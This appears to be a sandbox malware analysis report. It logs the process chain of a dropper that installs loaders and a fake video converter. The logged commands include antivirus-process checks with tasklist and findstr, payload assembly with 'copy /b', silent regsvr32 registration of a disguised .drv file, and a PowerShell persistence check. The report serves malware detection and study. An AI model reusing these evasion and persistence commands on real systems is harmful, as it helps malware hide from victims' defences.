                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B04B306_2_00B04B30
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B04DE06_2_00B04DE0
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B42D106_2_00B42D10
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B4779B6_2_00B4779B
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B37F366_2_00B37F36
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_000670497_2_00067049
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_000688607_2_00068860
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_000678BB7_2_000678BB
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_000631A87_2_000631A8
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00024B307_2_00024B30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00062D107_2_00062D10
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00024DE07_2_00024DE0
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00057F367_2_00057F36
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_0006779B7_2_0006779B
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\Flv2AVIConverter\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: String function: 00B180C0 appears 130 times
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 000380C0 appears 130 times
                            Source: random[1].exe0.9.drStatic PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
                            Source: 179187318e.exe.9.drStatic PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
                            Source: random[1].exe2.9.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                            Source: f46bdbcca4.exe.9.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                            Source: infinity.tmp.10.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: infinity.tmp.10.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: infinity.tmp.10.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                            Source: flv2aviconverter24.exe.11.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
                            Source: is-2E87P.tmp.11.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: is-2E87P.tmp.11.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: is-2E87P.tmp.11.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                            Source: Flv2AVIConverter.exe.12.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
                            Source: f46bdbcca4.tmp.31.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: f46bdbcca4.tmp.31.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: f46bdbcca4.tmp.33.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: f46bdbcca4.tmp.33.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: is-0DEO7.tmp.34.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: is-0DEO7.tmp.34.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: is-B6V2L.tmp.11.drStatic PE information: Number of sections : 19 > 10
                            Source: is-M72JG.tmp.34.drStatic PE information: Number of sections : 23 > 10
                            Source: sqlite3.dll.12.drStatic PE information: Number of sections : 19 > 10
                            Source: random[3].exe1.9.drStatic PE information: No import functions for PE file found
                            Source: 6299d9e5a5.exe.9.drStatic PE information: No import functions for PE file found
                            Source: random[3].exe1.9.drStatic PE information: Data appended to the last section found
                            Source: 6299d9e5a5.exe.9.drStatic PE information: Data appended to the last section found
                            Source: AApUa7VQiy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: AApUa7VQiy.exeStatic PE information: Section: ZLIB complexity 0.9987018864329268
                            Source: AApUa7VQiy.exeStatic PE information: Section: litpxdqa ZLIB complexity 0.9944398603008904
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: Section: bzipjhra ZLIB complexity 0.994681526565322
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.drStatic PE information: Section: ZLIB complexity 0.9978393222070845
                            Source: skotes.exe.6.drStatic PE information: Section: ZLIB complexity 0.9978393222070845
                            Source: random[4].exe.9.drStatic PE information: Section: ZLIB complexity 0.9986840224847561
                            Source: random[4].exe.9.drStatic PE information: Section: zqjesnms ZLIB complexity 0.994311055792034
                            Source: 072d564b60.exe.9.drStatic PE information: Section: ZLIB complexity 0.9986840224847561
                            Source: 072d564b60.exe.9.drStatic PE information: Section: zqjesnms ZLIB complexity 0.994311055792034
                            Source: random[3].exe0.9.drStatic PE information: Section: ZLIB complexity 0.9983653846153846
                            Source: random[3].exe0.9.drStatic PE information: Section: gopdotwy ZLIB complexity 0.994856120556698
                            Source: d37c6a3c82.exe.9.drStatic PE information: Section: ZLIB complexity 0.9983653846153846
                            Source: d37c6a3c82.exe.9.drStatic PE information: Section: gopdotwy ZLIB complexity 0.994856120556698
                            Source: random[2].exe0.9.drStatic PE information: Section: bzipjhra ZLIB complexity 0.994681526565322
                            Source: 513076b4b2.exe.9.drStatic PE information: Section: bzipjhra ZLIB complexity 0.994681526565322
                            Source: ktIplF5[1].exe.9.drStatic PE information: Section: ZLIB complexity 0.9985649294969512
                            Source: ktIplF5[1].exe.9.drStatic PE information: Section: mzomafvq ZLIB complexity 0.994594894431988
                            Source: ktIplF5.exe.9.drStatic PE information: Section: ZLIB complexity 0.9985649294969512
                            Source: ktIplF5.exe.9.drStatic PE information: Section: mzomafvq ZLIB complexity 0.994594894431988
                            Source: random[1].exe0.9.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                            Source: 179187318e.exe.9.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                            Source: random[1].exe1.9.drStatic PE information: Section: ZLIB complexity 1.0003080638801263
                            Source: random[1].exe1.9.drStatic PE information: Section: jxlmjtji ZLIB complexity 0.9947070020553064
                            Source: df1b740bf8.exe.9.drStatic PE information: Section: ZLIB complexity 1.0003080638801263
                            Source: df1b740bf8.exe.9.drStatic PE information: Section: jxlmjtji ZLIB complexity 0.9947070020553064
                            Source: random[2].exe1.9.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                            Source: 61f0c6628c.exe.9.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                            Source: d37c6a3c82.exe.9.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                            Source: random[3].exe0.9.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                            Source: random[2].exe2.9.dr, aNQaxxDiYjXg.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 4ee3234999.exe.9.dr, aNQaxxDiYjXg.csCryptographic APIs: 'TransformFinalBlock'
                            Source: random[2].exe2.9.dr, uBQRQemRwragayxWIgNspKbnCcaXv.csBase64 encoded string: 'UjOLnpsOJjNzssPOxvSoj1eKmz8vkCIys4dDTFLHahANWrfYOnRN4T+GbEUicJ0iPvGd8+nwwnYnLgNudsHtBLsqZ00Xo1cdp6i8KFSMIMK5MSLzf5uVjAksjlgO6fC/nv8nrIJaz2T7sF843NNYO9zQsx6M9iZWpG9IXvqOUFY7XElBC3JXOmXV6sMFuF/ofc7/o7kk/KGSyDxOTwDQAEFO5nvwR1VYNlKI1Dcba7Jjz5nx9irdjdPh49J+As5hfc7/o7kk/KFgUNUzr+u1ODSgWHK7L2iCIsRQvQICfjJcv7Q0NY+WMf20fUDUiwRGFrAteBaQC0Ymh4SO4VK4/7ukw+drkc2A6UYwlwPH3oTAqwuUGSFVrfL2uARqPN0uuTb/NHKiPmo+2t9i+WVkyxStZ/HNPDxDi7f4opyBinnlL04xb5iWmx74x7GC3AeXDmpJrIpfCLl3nbKRNfkucR6g3COiRFcbqBi+Ltrp+XxcXQqU9hf2UVaQhUDsNlQArVagZGQrXUeqqevEcSK4LUWAzoKL/515HvjHsYLcB5d1bqbjY5CFmAksjlgO6fC/nv8nrIJaz2TdgpJyw0BJhXw4OZcRsgNwdNvwRwAYhld9zv+juST8oeUeNkGulXthEFI8bZ2aegVEGJE/t1j0L6Fih/BuSIpqX+YD2JZERLqd/Q6iGbvmi+VxFMqHYLqHf3VNoyNr3cR9zv+juST8oQhx8gojIC6QAeGXtwvwFGEPruJ4D9Z1MI++IhThja9tE28xRs5lWOkzsvVM5VXI5MBD6SDiDRk43VG1hY5ZHPd9zv+juST8oRzbvZts4YMCmmEdQugPAEwlbslN6hMpn6nA8VHcFDrcKEgYmxEae0yw/B9rYsv7u6xNrQcYfRyuO1xJQQtyVzpAm4v9QWJdfp1SEdeJMpZL'
                            Source: 4ee3234999.exe.9.dr, uBQRQemRwragayxWIgNspKbnCcaXv.csBase64 encoded string: 'UjOLnpsOJjNzssPOxvSoj1eKmz8vkCIys4dDTFLHahANWrfYOnRN4T+GbEUicJ0iPvGd8+nwwnYnLgNudsHtBLsqZ00Xo1cdp6i8KFSMIMK5MSLzf5uVjAksjlgO6fC/nv8nrIJaz2T7sF843NNYO9zQsx6M9iZWpG9IXvqOUFY7XElBC3JXOmXV6sMFuF/ofc7/o7kk/KGSyDxOTwDQAEFO5nvwR1VYNlKI1Dcba7Jjz5nx9irdjdPh49J+As5hfc7/o7kk/KFgUNUzr+u1ODSgWHK7L2iCIsRQvQICfjJcv7Q0NY+WMf20fUDUiwRGFrAteBaQC0Ymh4SO4VK4/7ukw+drkc2A6UYwlwPH3oTAqwuUGSFVrfL2uARqPN0uuTb/NHKiPmo+2t9i+WVkyxStZ/HNPDxDi7f4opyBinnlL04xb5iWmx74x7GC3AeXDmpJrIpfCLl3nbKRNfkucR6g3COiRFcbqBi+Ltrp+XxcXQqU9hf2UVaQhUDsNlQArVagZGQrXUeqqevEcSK4LUWAzoKL/515HvjHsYLcB5d1bqbjY5CFmAksjlgO6fC/nv8nrIJaz2TdgpJyw0BJhXw4OZcRsgNwdNvwRwAYhld9zv+juST8oeUeNkGulXthEFI8bZ2aegVEGJE/t1j0L6Fih/BuSIpqX+YD2JZERLqd/Q6iGbvmi+VxFMqHYLqHf3VNoyNr3cR9zv+juST8oQhx8gojIC6QAeGXtwvwFGEPruJ4D9Z1MI++IhThja9tE28xRs5lWOkzsvVM5VXI5MBD6SDiDRk43VG1hY5ZHPd9zv+juST8oRzbvZts4YMCmmEdQugPAEwlbslN6hMpn6nA8VHcFDrcKEgYmxEae0yw/B9rYsv7u6xNrQcYfRyuO1xJQQtyVzpAm4v9QWJdfp1SEdeJMpZL'
                            Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@95/129@48/9
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\QBQOKU2Y.htmJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1480:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_03
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile created: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                            Source: AApUa7VQiy.exe, 00000000.00000003.1329606263.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1329196855.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1341479380.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1942518285.0000000005B99000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1942216567.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925905974.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1926471261.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                            Source: AApUa7VQiy.exeVirustotal: Detection: 61%
                            Source: AApUa7VQiy.exeReversingLabs: Detection: 52%
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: BEB973FPO2R62ZWABVOVP8TC.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile read: C:\Users\user\Desktop\AApUa7VQiy.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\AApUa7VQiy.exe "C:\Users\user\Desktop\AApUa7VQiy.exe"
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeProcess created: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe "C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe"
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeProcess created: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe "C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe"
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe "C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exeProcess created: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp "C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp" /SL5="$C0024,3499155,56832,C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe"
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpProcess created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe "C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe" -i
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe "C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe"
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe "C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 36469
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Geographic
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TEAMS" Mw
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Avoiding.com L
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe "C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe"
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp "C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp" /SL5="$E0074,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe"
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpProcess created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp "C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp" /SL5="$30490,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe "C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
